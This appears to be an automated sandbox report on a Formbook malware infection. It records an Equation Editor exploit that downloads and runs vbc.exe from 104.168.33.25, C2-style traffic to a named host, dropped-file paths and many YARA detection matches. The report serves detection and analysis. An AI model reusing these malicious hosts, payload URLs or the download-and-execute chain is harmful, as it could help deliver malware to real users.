Source: explorer.exe, 00000007.00000000.1050559717.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019814122.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004615683.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerq
Source: explorer.exe, 00000007.00000000.1021455911.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995504335.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006602259.0000000004385000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerv
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F22AACBE.emf Jump to behavior
Source: unknown DNS traffic detected: queries for: www.insurancecentral.info
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660560
Source: global traffic HTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.25Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1Host: www.xinli-ac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040580F

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 2.2.EQNEDT32.EXE.5acf30.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.EQNEDT32.EXE.5acf30.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01321890 5_2_01321890
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0132C3BD 5_2_0132C3BD
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0132A184 5_2_0132A184
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_0132B3F1 5_2_0132B3F1
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01329C12 5_2_01329C12
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_013296A0 5_2_013296A0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_01327E88 5_2_01327E88
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 5_2_00110A56 5_2_00110A56
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041E819 6_2_0041E819
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041E0B6 6_2_0041E0B6
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00402D89 6_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00409E5B 6_2_00409E5B
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00409E60 6_2_00409E60
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041DE2C 6_2_0041DE2C
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0041E79E 6_2_0041E79E
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0132A184 6_2_0132A184
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_01321890 6_2_01321890
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0132C3BD 6_2_0132C3BD
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 6_2_0132B3F1 6_2_0132B3F1
